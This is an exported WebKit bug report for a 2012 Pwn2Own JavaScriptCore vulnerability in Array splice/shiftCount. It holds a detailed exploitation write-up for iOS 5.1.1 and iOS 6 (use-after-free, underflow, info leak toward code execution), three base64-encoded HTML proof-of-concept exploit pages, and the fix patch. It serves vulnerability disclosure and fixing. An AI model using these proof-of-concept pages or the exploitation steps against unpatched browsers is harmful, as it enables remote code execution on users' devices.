97603 CVE-2012-3748 2012-09-25 14:15:01 -0700 (Mobile Pwn2Own) ZDI-CAN-1657: : WebKit Shiftcount Vulnerability 2017-04-13 08:49:25 -0700 1 1 1 Unclassified WebKit JavaScriptCore Other All Unspecified RESOLVED FIXED https://bugs.webkit.org/show_bug.cgi?id=98080 InRadar P1 Critical --- 1 jeffcz fpizlo ayao barraclough bfulgham ddkilzer dev+webkit fpizlo ggaren inferno jeffcz oliver staikos yong.li.webkit oldest_to_newest 727951 0 165669 jeffcz 2012-09-25 14:15:01 -0700 Created attachment 165669 poc for iOS 5.1.1 ZDI-CAN-1657: (Mobile Pwn2Own) WebKit Shiftcount Remote Code Execution Vulnerability -- CVSS ----------------------------------------- 7.5, AV:N/AC:L/Au:N/C:P/I:P/A:P -- ABSTRACT ------------------------------------- TippingPoint has identified a vulnerability affecting the following products: WebKit -- CREDIT --------------------------------------- This vulnerability was discovered by: Joost Pol, Certified Secure Daan Keuper, Certified Secure 727952 1 jeffcz 2012-09-25 14:15:22 -0700 Abstract: Vulnerability in shiftCount/splice ArrayPrototype.cpp::arrayProtoFuncSplice can be tricked into passing a "count" >= array.length to JSArray.cpp::shiftCount. This in turn can be used to trick JSArray.cpp::shiftCount into shifting an array beyond its length and/or shifting array with sparse values in it. This leads to an exploitable scenario in both IOS 5.1.1 and IOS 6. It is debatle wether the vulnerability is in arrayProtoFuncSplice (which contains a simple toctou) or in shiftCount (which does not validate its passed parameters correctly). We would suggest patching both shiftCount (validating count) and splice (fixup the toctou). JavaScriptCore/runtime/ArrayProtoType.cpp::arrayProtoFuncSplice The "deleteCount" is checked against the array length, but the array length can be changed from the toInteger callback. See the code below from the arrayProtoFuncSplice function (IOS 5.1.1 fragment): Simple toctou in the splice routine: unsigned length = thisObj->get(exec, exec->propertyNames().length).toUInt32(exec); ... double deleteDouble = exec->argument(1).toInteger(exec); // * .. if (deleteDouble > length - begin) deleteCount = length - begin; .. ((JSArray *)thisObj)->shiftCount(exec, deleteCount - additionalArgs); *) toInteger -> interrupt and shrink thisObj (making deleteCount >= array.length) JavaScriptCore/runtime/JSArray.cpp::shiftCount Both IOS5.1.1 and IOS 6: When a "count" > length is passed both the numValuesInVector and m_length members will wrap-around leading to an exploitable scenario. Specific to IOS 5.1.1: When passing a count == length *and* there are sparse-values in the map, the length can be shifted *without* removing/invalidating the sparse-value entries. exploitPath: IOS 5.1.1 Straightforward exploitation on IOS 5.1.1. The exploit path we chose for IOS 5.1.1 uses the above situation to setup an array with valid values in the vector but where the array's m_length < m_NumValuesInVector. When GC kicks in, the values in the vector will not be marked (see visitChildren). Since we can still access the values (see getIndex) we have a classic use-after-free. This use-after-free can be abused in multiple ways and will most certainly lead to code execution. In the exploit demonstrated at the pwn2own we chose to use the dangling references to shift the "resObj" local-variable in the splice routine. This will trigger another memory-overwrite. The use-after-free is illustarted in the POC. exploitPath: IOS 6 More complicated exploitation on IOS 6: Garbage colletion and allocations work differently. Important differnce is also that shiftCount does not allowing shifting when there are sparse values in the map: if (oldLength != storage->m_numValuesInVector ...) return; First we trigger the vulnerability to setup an (empty) array where the m_numValuesInVector wrapped to -1 (0xFFFFFFFF). Next we insert some sparse-value entries at the end of the map (0xFFFFFFFE and down). Important: Nos we set the array length to 0xFFFFFFF, this does not delete any values from the map (*increment* of length) but does make sure that m_length == mNumValuesInVector (both -1). Now we can trigger the splice-routine again, but this time *with* some values in the sparsemap. This will decrease the length again (*below* our sparse-value-indexes) but will leave our values untouched. For clarity we set the length to zero (changes nothing). Now we again have an array with sparse-values in it but with a zero length. Inserting non-sparse values into this array will trigger a sparse-map -> vector move in putBeyondIndex The vector will be (re)allocated based on the (faulty) length and the values from the sparse map will be moved into the vector. Since we are using large indexes (X - 0xFFFFFFE) this will actually start *underflowing* the m_vector array: vector[it->first].set(globalData, this, it->second.getNonSparseMode()); This underflow can be abused easiliy and will most certainly lead to code execution. The path we confirmed for IOS6 uses the underflow to overwrite (with an atrbitrary address) the "allocBase" of another array. Whenever a reallocation of this array is triggered, values will be copied into the array from the address we specified. This in turn gives us a nice info-leak but also leads directly to code execution since we can just copy abtitrary values/cell into the vector and access them. The underflow and info-leak vector are illustrated in the POCs. 727953 2 jeffcz 2012-09-25 14:15:42 -0700 <rdar://problem/12370864> 727955 3 165670 jeffcz 2012-09-25 14:16:22 -0700 Created attachment 165670 poc of iOS 6.0 crash 727956 4 165671 jeffcz 2012-09-25 14:16:37 -0700 Created attachment 165671 poc of iOS 6.0 leak 727958 5 inferno 2012-09-25 14:18:36 -0700 looks like a JSC bug. 728064 6 165696 fpizlo 2012-09-25 16:12:26 -0700 Created attachment 165696 the patch 728075 7 165696 barraclough 2012-09-25 16:23:47 -0700 Comment on attachment 165696 the patch You might want to put an ASSERT inside the array shift/unshift methods to check count is sane for current length. r+ 728092 8 fpizlo 2012-09-25 17:21:15 -0700 (In reply to comment #7) > (From update of attachment 165696 [details]) > You might want to put an ASSERT inside the array shift/unshift methods to check count is sane for current length. r+ Yup, I've done that. It doesn't break things. 728093 9 fpizlo 2012-09-25 17:23:00 -0700 Landed in http://trac.webkit.org/changeset/129577 165669 2012-09-25 14:15:01 -0700 2012-09-25 14:15:01 -0700 poc for iOS 5.1.1 ios5poc.html text/html 2868 jeffcz PGh0bWw+PGhlYWQ+PHNjcmlwdD4NCg0KLy8gSU9TNS4xLjEgUE9DOiANCi8vDQovLyBJbGx1c3Ry YXRpbmcgc2hpZnRDb3VudCAtPiB1c2UtYWZ0ZXItZnJlZSAtPiBjcmFzaC9yZWFsbG9jYXRpb24N Cg0KdmFyIENSQVNIID0gMTsgLy8gemVybyB3aWxsIGlsbHVzdHJhdGUgcmUtdXNlIGluc3RlYWQN Cg0KdmFyIFNJWkVPRl9BUlJBWVNUT1JBR0UgPSAzMjsNCg0KdmFyIFNJWkVPRl9KU1ZBTFVFID0g ODsNCg0KdmFyIFNQQVJTRV9PRkZTRVQgPSAxNjM4NDsgDQoNCnZhciBMRUFLX09CSkVDVF9DT1VO VCA9IDg7DQoNCnZhciBCTE9DS19TSVpFID0gMTY7DQoNCnZhciBsZWFrYXJyYXkgPSBbXTsNCg0K dmFyIHNyY29iamVjdCA9IHt9Ow0KDQovLyBzaGFyZWQvY29tbW9uIGNydWZ0DQoNCmZ1bmN0aW9u IGRlYnVnKG1lc3NhZ2UpIHsgaWYoMCkgYWxlcnQobWVzc2FnZSk7IH07DQoNCmZ1bmN0aW9uIG1v ZHVsbyhhLCBiKSB7IHJldHVybiBhIC0gTWF0aC5mbG9vcihhL2IpKmI7IH0NCg0KZnVuY3Rpb24g anNpbnQoeCkgeyB4ID0gTnVtYmVyKHgpOyByZXR1cm4geCA8IDAgPyBNYXRoLmNlaWwoeCkgOiBN YXRoLmZsb29yKHgpOyB9DQoNCmZ1bmN0aW9uIHVpbnQzMih4KSB7IHJldHVybiBtb2R1bG8oanNp bnQoeCksIE1hdGgucG93KDIsIDMyKSk7IH0NCg0KZnVuY3Rpb24gc3RvcmFnZXNpemUodmVjdG9y U2l6ZSkgeyByZXR1cm4gdWludDMyKCANCg0KICAgIChTSVpFT0ZfQVJSQVlTVE9SQUdFIC0gU0la RU9GX0pTVkFMVUUpICsgKHZlY3RvclNpemUgKiBTSVpFT0ZfSlNWQUxVRSkgKTsgfQ0KDQpmdW5j dGlvbiB2ZWN0b3JzaXplKHN0b3JhZ2VzaXplKSB7IHJldHVybiB1aW50MzIoDQoNCiAgICAoc3Rv cmFnZXNpemUgLSAoU0laRU9GX0FSUkFZU1RPUkFHRSAtIFNJWkVPRl9KU1ZBTFVFKSApIC8gU0la RU9GX0pTVkFMVUUpOyB9DQoNCmZ1bmN0aW9uIGFsbG9jYXRlYmxvY2soYmxvY2tzaXplKSB7IA0K DQogICAgdmFyIHJldHZhbCA9IHt9OyANCg0KICAgIHJldHZhbC5sZW5ndGggPSB2ZWN0b3JzaXpl KGJsb2Nrc2l6ZSk7DQoNCiAgICByZXR1cm4gQXJyYXkucHJvdG90eXBlLnNwbGljZS5jYWxsKHJl dHZhbCwgMCk7DQp9DQoNCmZ1bmN0aW9uIHRyaWdnZXJfZ2MoKSB7IA0KDQogICAgYWxsb2NhdGVi bG9jaygxICogMTAyNCAqIDEwMjQpOw0KICAgIA0KICAgIGFsbG9jYXRlYmxvY2soMSAqIDEwMjQg KiAxMDI0KTsNCn0NCg0KZnVuY3Rpb24gc29ydGZ1bmMobGVmdCwgcmlnaHQpIHsgcmV0dXJuIDA7 IH0gDQoNCnRyeSB7IC8vIGhlcmUgZ29lcyBub3RoaW5nDQoNCgl2YXIgY291bnRlciA9IDA7DQoN Cgl2YXIgZGVsZXRlRG91YmxlID0ge307DQoNCgkvLyBkZWxldGVEb3VibGUgY2FsbGJhY2sgaW52 b2tlZCBmcm9tIHRvSW50ZWdlcigpDQoNCglkZWxldGVEb3VibGUudG9TdHJpbmcgPSBmdW5jdGlv bigpIHsgDQoNCgkJCWRlYnVnKCJwb2M6IGZpeHVwIGxlbmd0aCBmcm9tIGNhbGxiYWNrIik7DQoJ CQkNCgkJCWxlYWthcnJheS5sZW5ndGggPSBMRUFLX09CSkVDVF9DT1VOVCArIFNQQVJTRV9PRkZT RVQgKyA0MjsNCgkJCQ0KCQkJcmV0dXJuIGxlYWthcnJheS5sZW5ndGg7DQoJfQ0KDQoJZGVidWco InBvYzogYWxsb2NhdGluZyBvYmplY3RzIik7DQoNCglmb3IoY291bnRlciA9IDA7IA0KDQoJCWNv dW50ZXIgPCBMRUFLX09CSkVDVF9DT1VOVDsgDQoNCgkJY291bnRlcisrKSBsZWFrYXJyYXlbU1BB UlNFX09GRlNFVCArIGNvdW50ZXJdID0gbmV3IERhdGU7DQoNCglkZWJ1ZygicG9jOiB0cmlnZ2Vy LXZ1bG5lcmFiaWxpdHkiKTsNCg0KCWxlYWthcnJheS5sZW5ndGggKz0gNDI7DQoNCglBcnJheS5w cm90b3R5cGUuc3BsaWNlLmNhbGwobGVha2FycmF5LCAwLCBkZWxldGVEb3VibGUpOw0KDQoJZGVi dWcoInBvYzogbW92aW5nIHNwYXJzZS1tYXAgaW50byB2ZWN0b3IiKTsNCg0KCWxlYWthcnJheS5s ZW5ndGggPSAxOyANCg0KCXRyeSB7IC8vIGlnbm9yZSBleGNlcHRpb25zIGZyb20gc29ydCBmb3Ig bm93IA0KDQoJCUFycmF5LnByb3RvdHlwZS5zb3J0LmNhbGwobGVha2FycmF5LCBzb3J0ZnVuYyk7 DQoNCgl9IGNhdGNoKGlnbm9yZWQpIHsgfTsNCg0KCWRlYnVnKCJwb2M6IGdjIik7DQoNCgl0cmln Z2VyX2djKCk7DQoNCglpZighKENSQVNIKSkgew0KDQoJCWRlYnVnKCJwb2M6IHJlYWxsb2NhdGlu ZyBvYmplY3RzIik7DQoNCgkJLy8gTm90ZTogaGVyZSB3ZSBjb3VsZCBhbHNvIGludm9rZSBzcGxp Y2UgYWdhaW4gYW5kIGZvcmNlIA0KCQkvLyByZWFsbG9jYXRpb24gYXMgInJlc09iaiIgKHNlZSBB cnJheVByb3RvVHlwZS5jcHApIGFuZA0KCQkvLyBzaGlmdCB0aGF0IHRvIHRyaWdnZXIgbWVtb3J5 LWNvcnJ1cHRpb24uIEluIHRoZSBQT0MNCgkJLy8gd2Ugc2ltcGx5IGRlbW9uc3RyYXRlIHRoZSBy ZS11c2UgYXMgYW4gYXJyYXkuDQoNCgkJZm9yKGNvdW50ZXIgPSAwOyANCgkNCgkJCWNvdW50ZXIg PCBMRUFLX09CSkVDVF9DT1VOVCAqIDI7IA0KCQ0KCQkJY291bnRlcisrKSByZWFsbG9jYXRlZCA9 IG5ldyBBcnJheTsNCgl9DQoJDQoJZGVidWcoImFjY2Vzc2luZyBhZnRlciByZWFsbG9jYXRpb24i KTsNCg0KCWZvcihjb3VudGVyID0gMTsgY291bnRlciA8IExFQUtfT0JKRUNUX0NPVU5UOyBjb3Vu dGVyKyspIHsNCg0KCQl2YXIgZW50cnkgPSBsZWFrYXJyYXlbY291bnRlcl07DQoNCgkJYWxlcnQo dHlwZW9mKGVudHJ5KSk7DQoNCgkJYWxlcnQoZW50cnkuY29uc3RydWN0b3IpOyANCg0KCQllbnRy eS5mdWJhciA9IDE7IA0KCX0NCg0KCWFsZXJ0KCJkb25lIik7DQoNCn0gY2F0Y2goZXJyb3IpIHsg YWxlcnQoIkVwaWMgRmFpbHVyZTogIiArIGVycm9yKTsgfQ0KDQo8L3NjcmlwdD48L2hlYWQ+PGJv ZHkvPjwvaHRtbD4JDQoJIA0K 165670 2012-09-25 14:16:22 -0700 2012-09-25 14:16:22 -0700 poc of iOS 6.0 crash ios6poc-crash.html text/html 2042 jeffcz PGh0bWw+PGhlYWQ+PHNjcmlwdD4NCg0KLy8gSU9TNiBQT0M6DQovLw0KLy8gSWxsdXN0cmF0aW5n IHNoaWZ0Q291bnQgLT4gdW5kZXJmbG93IC0+IGNyYXNoIA0KLy8NCi8vIE5vdGU6IGNyYXNoaW5n IGJ5IG92ZXJ3cml0aW5nIGZ1bmN0aW9uLm5hbWUgd2l0aCBub24tc3RyaW5nDQoNCnZhciBVTkRF UkZMT1dfQ09VTlQgPSA2NDsgLy8gYmVmb3JlOiA0IG9yIDUNCg0KdmFyIFVOREVSRkxPV19PRkZT RVQgPSB1aW50MzIoLTIpOw0KDQp2YXIgY291bnRlciA9IDA7DQoNCnZhciBkZWxldGVEb3VibGUg PSB7fTsNCg0KdmFyIGJhc2VhcnJheSA9IFtdOw0KDQovLyBzaGFyZWQvY29tbW9uIGNydWZ0DQoN CmZ1bmN0aW9uIGRlYnVnKG1lc3NhZ2UpIHsgaWYoMCkgYWxlcnQobWVzc2FnZSk7IH07DQoNCmZ1 bmN0aW9uIG1vZHVsbyhhLCBiKSB7IHJldHVybiBhIC0gTWF0aC5mbG9vcihhL2IpKmI7IH0NCg0K ZnVuY3Rpb24ganNpbnQoeCkgeyB4ID0gTnVtYmVyKHgpOyByZXR1cm4geCA8IDAgPyBNYXRoLmNl aWwoeCkgOiBNYXRoLmZsb29yKHgpOyB9DQoNCmZ1bmN0aW9uIHVpbnQzMih4KSB7IHJldHVybiBt b2R1bG8oanNpbnQoeCksIE1hdGgucG93KDIsIDMyKSk7IH0NCg0KdHJ5IHsgLy8gaGVyZSBnb2Vz IG5vdGhpbmcNCg0KCWRlYnVnKCJwb2M6IHRyaWdnZXItdnVsbmVyYWJpbGl0eSIpOw0KDQoJLy8g ZGVsZXRlRG91YmxlIGNhbGxiYWNrIGludm9rZWQgZnJvbSB0b0ludGVnZXIoKQ0KDQoJZGVsZXRl RG91YmxlLnRvU3RyaW5nID0gZnVuY3Rpb24oKSB7IA0KDQoJCQlkZWJ1ZygicG9jOiBmaXh1cCBs ZW5ndGggZnJvbSBjYWxsYmFjayIpOw0KCQkJDQoJCQliYXNlYXJyYXkubGVuZ3RoID0gMTsgcmV0 dXJuIDI7IA0KCX0NCg0KCWJhc2VhcnJheVswXSA9ICJ0ZXN0aW5nIjsNCg0KCWJhc2VhcnJheS5s ZW5ndGggKz0gNDI7DQoNCglBcnJheS5wcm90b3R5cGUuc3BsaWNlLmNhbGwoYmFzZWFycmF5LCAw LCBkZWxldGVEb3VibGUpOw0KDQoJZGVidWcoInBvYzogaW5zZXJ0IHVuZGVyZmxvdy1zb3VyY2Ug dmFsdWVzIGludG8gaGFzaC1tYXAiKTsNCg0KCWZvcihjb3VudGVyID0gMDsgY291bnRlciA8IFVO REVSRkxPV19DT1VOVDsgY291bnRlcisrKSB7DQoNCgkJYmFzZWFycmF5W1VOREVSRkxPV19PRkZT RVQgLSBjb3VudGVyXSA9IG5ldyBOdW1iZXIoMSk7DQoJfQ0KDQoJZGVidWcoInBvYzogc2hpZnRp bmcgbGVuZ3RoIGJlZm9yZSBzcGFyc2UtbWFwIGluZGV4Iik7DQoNCgliYXNlYXJyYXkubGVuZ3Ro ID0gdWludDMyKC0xKTsgLy8gc2hvdWxkIG1hdGNoIHdhcnBlZCBudW1WYWx1ZXNJblZlY3Rvcg0K DQoJY291bnRlciA9IHVpbnQzMigtMSkgLSB1aW50MzIoVU5ERVJGTE9XX09GRlNFVCAtIFVOREVS RkxPV19DT1VOVCAtIDEpOw0KDQoJQXJyYXkucHJvdG90eXBlLnNwbGljZS5jYWxsKGJhc2VhcnJh eSwgMCwgY291bnRlcik7DQoNCgliYXNlYXJyYXkubGVuZ3RoID0gMDsgLy8gY2xlYW51cCwgbm8g Y2hhbmdlcw0KDQovLyBhbGxvY2F0aW9uIG9mIHRoZSBmdW5jdGlvbiAod2Ugd2lsbCBzaGFiYW0g Lm5hbWUpDQoNCnZhciBvYmogPSBwYXJzZUludDsgDQoNCmZvcihjb3VudGVyID0gMDsgY291bnRl ciA8IDE2OyBjb3VudGVyKyspIG9ialtjb3VudGVyXSA9IDE7DQoNCglkZWJ1ZygicG9jOiBtb3Zp bmcgc3BhcnNlLXZhbHVlcyBpbnRvIHZlY3RvciAodW5kZXJmbG93KSIpOw0KDQoJYmFzZWFycmF5 WzBdID0gMTsgLy8gd2lsbCBtb3ZlIHNwYXJzZS12YWx1ZXMgaW50byB0aGUgdmVjdG9yDQoNCglk ZWJ1ZygicG9jOiByZWFkeSB3aGVuIHlvdSBhcmUiKTsNCg0KCWFsZXJ0KCJsZWFrOiAweCIgKyBi YXNlYXJyYXkubGVuZ3RoLnRvU3RyaW5nKDE2KSk7DQoNCglhbGVydCgicG9vZjogIiArIG9iaik7 IC8vIHdpbGwgY3Jhc2ggYmVjYXVzZSAubmFtZSBub24tc3RyaW5nDQoNCglhbGVydCgibm90IHJl YWNoZWQiKTsNCg0KfSBjYXRjaChlcnJvcikgeyBhbGVydCgiRXBpYyBGYWlsdXJlOiAiICsgZXJy b3IpOyB9DQoNCjwvc2NyaXB0PjwvaGVhZD48Ym9keS8+PC9odG1sPgkNCgkgDQo= 165671 2012-09-25 14:16:37 -0700 2012-09-25 14:16:37 -0700 poc of iOS 6.0 leak ios6poc-leak.html text/html 1789 jeffcz PGh0bWw+PGhlYWQ+PHNjcmlwdD4NCg0KLy8gSU9TNiBQT0M6DQovLw0KLy8gSWxsdXN0cmF0aW5n IHNoaWZ0Q291bnQgLT4gdW5kZXJmbG93IC0+IGluZm8tbGVhaw0KDQp2YXIgU0laRU9GX0FSUkFZ U1RPUkFHRSA9IDMyOw0KDQp2YXIgU0laRU9GX0pTVkFMVUUgPSA4Ow0KDQp2YXIgVU5ERVJGTE9X X0NPVU5UID0gNDsNCg0KdmFyIFVOREVSRkxPV19PRkZTRVQgPSB1aW50MzIoLTIpOw0KDQp2YXIg Y291bnRlciA9IDA7DQoNCnZhciBkZWxldGVEb3VibGUgPSB7fTsNCg0KdmFyIGJhc2VhcnJheSA9 IFtdOw0KDQovLyBzaGFyZWQvY29tbW9uIGNydWZ0DQoNCmZ1bmN0aW9uIGRlYnVnKG1lc3NhZ2Up IHsgaWYoMCkgYWxlcnQobWVzc2FnZSk7IH07DQoNCmZ1bmN0aW9uIG1vZHVsbyhhLCBiKSB7IHJl dHVybiBhIC0gTWF0aC5mbG9vcihhL2IpKmI7IH0NCg0KZnVuY3Rpb24ganNpbnQoeCkgeyB4ID0g TnVtYmVyKHgpOyByZXR1cm4geCA8IDAgPyBNYXRoLmNlaWwoeCkgOiBNYXRoLmZsb29yKHgpOyB9 DQoNCmZ1bmN0aW9uIHVpbnQzMih4KSB7IHJldHVybiBtb2R1bG8oanNpbnQoeCksIE1hdGgucG93 KDIsIDMyKSk7IH0NCg0KdHJ5IHsgLy8gaGVyZSBnb2VzIG5vdGhpbmcNCg0KCWRlYnVnKCJwb2M6 IHRyaWdnZXItdnVsbmVyYWJpbGl0eSIpOw0KDQoJLy8gZGVsZXRlRG91YmxlIGNhbGxiYWNrIGlu dm9rZWQgZnJvbSB0b0ludGVnZXIoKQ0KDQoJZGVsZXRlRG91YmxlLnRvU3RyaW5nID0gZnVuY3Rp b24oKSB7IA0KDQoJCQlkZWJ1ZygicG9jOiBmaXh1cCBsZW5ndGggZnJvbSBjYWxsYmFjayIpOw0K CQkJDQoJCQliYXNlYXJyYXkubGVuZ3RoID0gMTsgcmV0dXJuIDI7IA0KCX0NCg0KCWJhc2VhcnJh eVswXSA9ICJ0ZXN0aW5nIjsNCg0KCWJhc2VhcnJheS5sZW5ndGggKz0gNDI7DQoNCglBcnJheS5w cm90b3R5cGUuc3BsaWNlLmNhbGwoYmFzZWFycmF5LCAwLCBkZWxldGVEb3VibGUpOw0KDQoJZGVi dWcoInBvYzogaW5zZXJ0IHVuZGVyZmxvdy1zb3VyY2UgdmFsdWVzIGludG8gaGFzaC1tYXAiKTsN Cg0KCWZvcihjb3VudGVyID0gMDsgY291bnRlciA8IFVOREVSRkxPV19DT1VOVDsgY291bnRlcisr KSB7DQoNCgkJYmFzZWFycmF5W1VOREVSRkxPV19PRkZTRVQgLSBjb3VudGVyXSA9IG5ldyBOdW1i ZXIoY291bnRlcik7DQoJfQ0KDQoJZGVidWcoInBvYzogc2hpZnRpbmcgbGVuZ3RoIGJlZm9yZSBz cGFyc2UtbWFwIGluZGV4Iik7DQoNCgliYXNlYXJyYXkubGVuZ3RoID0gdWludDMyKC0xKTsgLy8g c2hvdWxkIG1hdGNoIHdhcnBlZCBudW1WYWx1ZXNJblZlY3Rvcg0KDQoJY291bnRlciA9IHVpbnQz MigtMSkgLSB1aW50MzIoVU5ERVJGTE9XX09GRlNFVCAtIFVOREVSRkxPV19DT1VOVCAtIDEpOw0K DQoJQXJyYXkucHJvdG90eXBlLnNwbGljZS5jYWxsKGJhc2VhcnJheSwgMCwgY291bnRlcik7DQoN CgliYXNlYXJyYXkubGVuZ3RoID0gMDsgLy8gY2xlYW51cCwgbm8gY2hhbmdlcw0KDQoJZGVidWco InBvYzogbW92aW5nIHNwYXJzZS12YWx1ZXMgaW50byB2ZWN0b3IgKHVuZGVyZmxvdykiKTsNCg0K CWJhc2VhcnJheVswXSA9IDE7IC8vIHdpbGwgbW92ZSBzcGFyc2UtdmFsdWVzIGludG8gdGhlIHZl Y3Rvcg0KDQoJZGVidWcoInBvYzogcmVhZHkgd2hlbiB5b3UgYXJlIik7DQoNCglhbGVydCgibGVh azogMHgiICsgYmFzZWFycmF5Lmxlbmd0aC50b1N0cmluZygxNikpOw0KDQp9IGNhdGNoKGVycm9y KSB7IGFsZXJ0KCJFcGljIEZhaWx1cmU6ICIgKyBlcnJvcik7IH0NCg0KPC9zY3JpcHQ+PC9oZWFk Pjxib2R5Lz48L2h0bWw+CQ0KCSANCg== 165696 2012-09-25 16:12:26 -0700 2012-09-25 16:23:47 -0700 the patch slowarrays.patch text/plain 2160 fpizlo SW5kZXg6IFNvdXJjZS9KYXZhU2NyaXB0Q29yZS9DaGFuZ2VMb2cKPT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PQotLS0gU291 cmNlL0phdmFTY3JpcHRDb3JlL0NoYW5nZUxvZwkocmV2aXNpb24gMTI5NTY5KQorKysgU291cmNl L0phdmFTY3JpcHRDb3JlL0NoYW5nZUxvZwkod29ya2luZyBjb3B5KQpAQCAtMSwzICsxLDE3IEBA CisyMDEyLTA5LTI1ICBGaWxpcCBQaXpsbyAgPGZwaXpsb0BhcHBsZS5jb20+CisKKyAgICAgICAg V2Ugc2hvdWxkbid0IHVzZSB0aGUgb3B0aW1pemVkIHZlcnNpb25zIG9mIHNoaWZ0L3Vuc2hpZnQg aWYgdGhlIHVzZXIgaXMgZG9pbmcgY3JhenkgdGhpbmdzIHRvIHRoZSBhcnJheQorICAgICAgICBo dHRwczovL2J1Z3Mud2Via2l0Lm9yZy9zaG93X2J1Zy5jZ2k/aWQ9OTc2MDMKKyAgICAgICAgPHJk YXI6Ly9wcm9ibGVtLzEyMzcwODY0PgorCisgICAgICAgIFJldmlld2VkIGJ5IE5PQk9EWSAoT09Q UyEpLgorCisgICAgICAgIFlvdSBjaGFuZ2VkIHRoZSBsZW5ndGggYmVoaW5kIG91ciBiYWNrcz8g Tm8gb3B0aW1pemF0aW9ucyBmb3IgeW91IHRoZW4hCisKKyAgICAgICAgKiBydW50aW1lL0FycmF5 UHJvdG90eXBlLmNwcDoKKyAgICAgICAgKEpTQzo6c2hpZnQpOgorICAgICAgICAoSlNDOjp1bnNo aWZ0KToKKwogMjAxMi0wOS0yNSAgRmlsaXAgUGl6bG8gIDxmcGl6bG9AYXBwbGUuY29tPgogCiAg ICAgICAgIFN0cnVjdHVyZSBjaGVjayBob2lzdGluZyBwaGFzZSBkb2Vzbid0IGtub3cgYWJvdXQg dGhlIHNpZGUtZWZmZWN0aW5nIG5hdHVyZSBvZiBBcnJheWlmeQpJbmRleDogU291cmNlL0phdmFT Y3JpcHRDb3JlL3J1bnRpbWUvQXJyYXlQcm90b3R5cGUuY3BwCj09PT09PT09PT09PT09PT09PT09 PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT09PT0KLS0tIFNvdXJj ZS9KYXZhU2NyaXB0Q29yZS9ydW50aW1lL0FycmF5UHJvdG90eXBlLmNwcAkocmV2aXNpb24gMTI5 NTU5KQorKysgU291cmNlL0phdmFTY3JpcHRDb3JlL3J1bnRpbWUvQXJyYXlQcm90b3R5cGUuY3Bw CSh3b3JraW5nIGNvcHkpCkBAIC0yMDIsOCArMjAyLDExIEBAIHN0YXRpYyBpbmxpbmUgdm9pZCBz aGlmdChFeGVjU3RhdGUqIGV4ZWMKICAgICBBU1NFUlQoaGVhZGVyIDw9IGxlbmd0aCk7CiAgICAg QVNTRVJUKGN1cnJlbnRDb3VudCA8PSAobGVuZ3RoIC0gaGVhZGVyKSk7CiAKLSAgICBpZiAoIWhl YWRlciAmJiBpc0pTQXJyYXkodGhpc09iaikgJiYgYXNBcnJheSh0aGlzT2JqKS0+c2hpZnRDb3Vu dChleGVjLCBjb3VudCkpCi0gICAgICAgIHJldHVybjsKKyAgICBpZiAoIWhlYWRlciAmJiBpc0pT QXJyYXkodGhpc09iaikpIHsKKyAgICAgICAgSlNBcnJheSogYXJyYXkgPSBhc0FycmF5KHRoaXNP YmopOworICAgICAgICBpZiAoYXJyYXktPmxlbmd0aCgpID09IGxlbmd0aCAmJiBhc0FycmF5KHRo aXNPYmopLT5zaGlmdENvdW50KGV4ZWMsIGNvdW50KSkKKyAgICAgICAgICAgIHJldHVybjsKKyAg ICB9CiAKICAgICBmb3IgKHVuc2lnbmVkIGsgPSBoZWFkZXI7IGsgPCBsZW5ndGggLSBjdXJyZW50 Q291bnQ7ICsraykgewogICAgICAgICB1bnNpZ25lZCBmcm9tID0gayArIGN1cnJlbnRDb3VudDsK QEAgLTI0Miw4ICsyNDUsMTEgQEAgc3RhdGljIGlubGluZSB2b2lkIHVuc2hpZnQoRXhlY1N0YXRl KiBleAogICAgICAgICByZXR1cm47CiAgICAgfQogCi0gICAgaWYgKCFoZWFkZXIgJiYgaXNKU0Fy cmF5KHRoaXNPYmopICYmIGFzQXJyYXkodGhpc09iaiktPnVuc2hpZnRDb3VudChleGVjLCBjb3Vu dCkpCi0gICAgICAgIHJldHVybjsKKyAgICBpZiAoIWhlYWRlciAmJiBpc0pTQXJyYXkodGhpc09i aikpIHsKKyAgICAgICAgSlNBcnJheSogYXJyYXkgPSBhc0FycmF5KHRoaXNPYmopOworICAgICAg ICBpZiAoYXJyYXktPmxlbmd0aCgpID09IGxlbmd0aCAmJiBhc0FycmF5KHRoaXNPYmopLT51bnNo aWZ0Q291bnQoZXhlYywgY291bnQpKQorICAgICAgICAgICAgcmV0dXJuOworICAgIH0KIAogICAg IGZvciAodW5zaWduZWQgayA9IGxlbmd0aCAtIGN1cnJlbnRDb3VudDsgayA+IGhlYWRlcjsgLS1r KSB7CiAgICAgICAgIHVuc2lnbmVkIGZyb20gPSBrICsgY3VycmVudENvdW50IC0gMTsK